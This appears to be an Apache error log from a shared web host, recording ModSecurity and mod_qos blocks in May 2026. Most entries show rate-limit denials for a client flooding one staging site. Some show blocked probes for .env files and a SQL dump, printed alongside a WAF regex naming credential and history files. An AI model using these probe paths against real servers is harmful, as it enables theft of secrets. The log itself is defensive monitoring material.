[Tue May 26 19:54:07.436031 2026] [security2:error] [pid 93868:tid 94268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GcwAAAZk"]
[Tue May 26 19:54:07.443252 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GfAAAAdA"]
[Tue May 26 19:54:07.456460 2026] [security2:error] [pid 86490:tid 86661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K0_wAAAK4"]
[Tue May 26 19:54:07.476001 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1KAAAAM8"]
[Tue May 26 19:54:07.479817 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GfgAAAf4"]
[Tue May 26 19:54:07.485417 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GgQAAAZ4"]
[Tue May 26 19:54:07.487818 2026] [security2:error] [pid 86490:tid 86715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1JwAAAOQ"]
[Tue May 26 19:54:07.589544 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1nQAAANk
[Tue May 26 19:54:07.591343 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtB2DRMqfxdEDkoszNkAAAAGM
[Tue May 26 19:54:07.606406 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1nwAAAPw
[Tue May 26 19:54:07.608354 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1oQAAAKY
[Tue May 26 19:54:07.608541 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1ogAAALk
[Tue May 26 19:54:07.608590 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1oAAAAIw
[Tue May 26 19:54:07.674883 2026] [security2:error] [pid 93576:tid 93823] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNYwAAAG8"]
[Tue May 26 19:54:07.716486 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1pAAAAI4
[Tue May 26 19:54:07.717663 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB2DRMqfxdEDkoszNkgAAAGw
[Tue May 26 19:54:07.718061 2026] [qos:error] [pid 86490:tid 86724] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1pQAAAO0
[Tue May 26 19:54:07.719177 2026] [qos:error] [pid 86490:tid 86724] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1pgAAAO0
[Tue May 26 19:54:07.755771 2026] [security2:error] [pid 86490:tid 86746] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/postgres_dump.sql"] [unique_id "ahWtB1ZMwN0DpLVWo6K1qAAAAQM"]
[Tue May 26 19:54:07.814591 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1qQAAAKA
[Tue May 26 19:54:07.815962 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1qgAAAMU
[Tue May 26 19:54:07.815988 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1qwAAAJ4
[Tue May 26 19:54:07.816848 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1rAAAAJE
[Tue May 26 19:54:07.818285 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1rQAAAJU
[Tue May 26 19:54:07.819070 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1rgAAAJI
[Tue May 26 19:54:07.869207 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1rwAAAI0
[Tue May 26 19:54:07.869942 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1sAAAAI0
[Tue May 26 19:54:07.870574 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1sQAAAI0
[Tue May 26 19:54:07.872192 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB2DRMqfxdEDkoszNlAAAAB4
[Tue May 26 19:54:07.915738 2026] [security2:error] [pid 86490:tid 86637] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/services/redis-commander/.env"] [unique_id "ahWtB1ZMwN0DpLVWo6K1sgAAAJY"]
[Tue May 26 19:54:07.967201 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1tAAAAMg
[Tue May 26 19:54:07.967209 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1swAAAOU
[Tue May 26 19:54:07.968153 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1tQAAAMc
[Tue May 26 19:54:07.970859 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1tgAAAMM
[Tue May 26 19:54:07.971332 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1twAAAMI
[Tue May 26 19:54:07.975856 2026] [qos:error] [pid 86490:tid 86707] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1uAAAANw
[Tue May 26 19:54:08.021708 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1ugAAAOw
[Tue May 26 19:54:08.021711 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1uQAAAIg
[Tue May 26 19:54:08.024099 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1uwAAAJ8
[Tue May 26 19:54:08.025888 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCGDRMqfxdEDkoszNmQAAADo
[Tue May 26 19:54:08.116834 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1vgAAAJM
[Tue May 26 19:54:08.117887 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1vwAAAKQ
[Tue May 26 19:54:08.119578 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1wAAAAP4
[Tue May 26 19:54:08.123324 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1wQAAAPc
[Tue May 26 19:54:08.123680 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1wgAAAM8
[Tue May 26 19:54:08.127941 2026] [qos:error] [pid 86490:tid 86714] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1wwAAAOM
[Tue May 26 19:54:08.173106 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1xAAAALM
[Tue May 26 19:54:08.174762 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1xQAAAM4
[Tue May 26 19:54:08.177429 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCFZMwN0DpLVWo6K1xgAAAMQ
[Tue May 26 19:54:08.180632 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCGDRMqfxdEDkoszNmwAAABY
[Tue May 26 19:54:08.223417 2026] [security2:error] [pid 86490:tid 86497] [remote 148.72.247.18:43022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.247.72.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWtCFZMwN0DpLVWo6K1vAAA8QY"]
[Tue May 26 19:54:08.240213 2026] [security2:error] [pid 86490:tid 86639] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/preprod/.env"] [unique_id "ahWtCFZMwN0DpLVWo6K1xwAAAJg"]
[Tue May 26 19:54:08.286579 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1OAAAAI8"]
[Tue May 26 19:54:08.287317 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GhAAAAgg"]
[Tue May 26 19:54:08.289422 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1RgAAALI"]
[Tue May 26 19:54:08.289846 2026] [security2:error] [pid 86490:tid 86705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1JQAAANo"]
[Tue May 26 19:54:08.293618 2026] [security2:error] [pid 86490:tid 86738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1NwAAAPs"]
[Tue May 26 19:54:08.299002 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GggAAAag"]
[Tue May 26 19:54:08.302884 2026] [security2:error] [pid 86490:tid 86647] [client 64.89.161.160:59506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahWtCFZMwN0DpLVWo6K1ywAAAKA"]
[Tue May 26 19:54:08.306144 2026] [security2:error] [pid 86490:tid 86663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1RQAAALA"]
[Tue May 26 19:54:08.312019 2026] [security2:error] [pid 86490:tid 86731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1QAAAAPQ"]
[Tue May 26 19:54:08.312898 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GhQAAAeg"]
[Tue May 26 19:54:08.315095 2026] [security2:error] [pid 86490:tid 86673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1NgAAALo"]
[Tue May 26 19:54:08.343119 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GigAAAgw"]
[Tue May 26 19:54:08.356022 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB1ZMwN0DpLVWo6K1dwAAAPo"]
[Tue May 26 19:54:08.362716 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1NAAAAIU"]
[Tue May 26 19:54:08.364172 2026] [security2:error] [pid 93868:tid 94343] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GjgAAAeQ"]
[Tue May 26 19:54:08.367995 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1RAAAAKI"]
[Tue May 26 19:54:08.370658 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBmDRMqfxdEDkoszNRgAAADE"]
[Tue May 26 19:54:08.376042 2026] [security2:error] [pid 93868:tid 94375] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GmgAAAgQ"]
[Tue May 26 19:54:08.376807 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GjQAAAeE"]
[Tue May 26 19:54:08.379379 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1PAAAAN0"]
[Tue May 26 19:54:08.390717 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNfAAAADA"]
[Tue May 26 19:54:08.396862 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNewAAACg"]
[Tue May 26 19:54:08.399811 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GnAAAAd8"]
[Tue May 26 19:54:08.402097 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GowAAAf0"]
[Tue May 26 19:54:08.404047 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBmDRMqfxdEDkoszNTQAAAHc"]
[Tue May 26 19:54:08.413115 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB2DRMqfxdEDkoszNbwAAACs"]
[Tue May 26 19:54:08.413435 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GnwAAAeI"]
[Tue May 26 19:54:08.413760 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB1ZMwN0DpLVWo6K1iAAAAKc"]
[Tue May 26 19:54:08.417050 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GmQAAAaY"]
[Tue May 26 19:54:08.417858 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GnQAAAZs"]
[Tue May 26 19:54:08.440746 2026] [security2:error] [pid 93868:tid 94351] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GoQAAAew"]
[Tue May 26 19:54:08.440885 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtB0qK9k_ZUB2Vp25GoAAAAgI"]
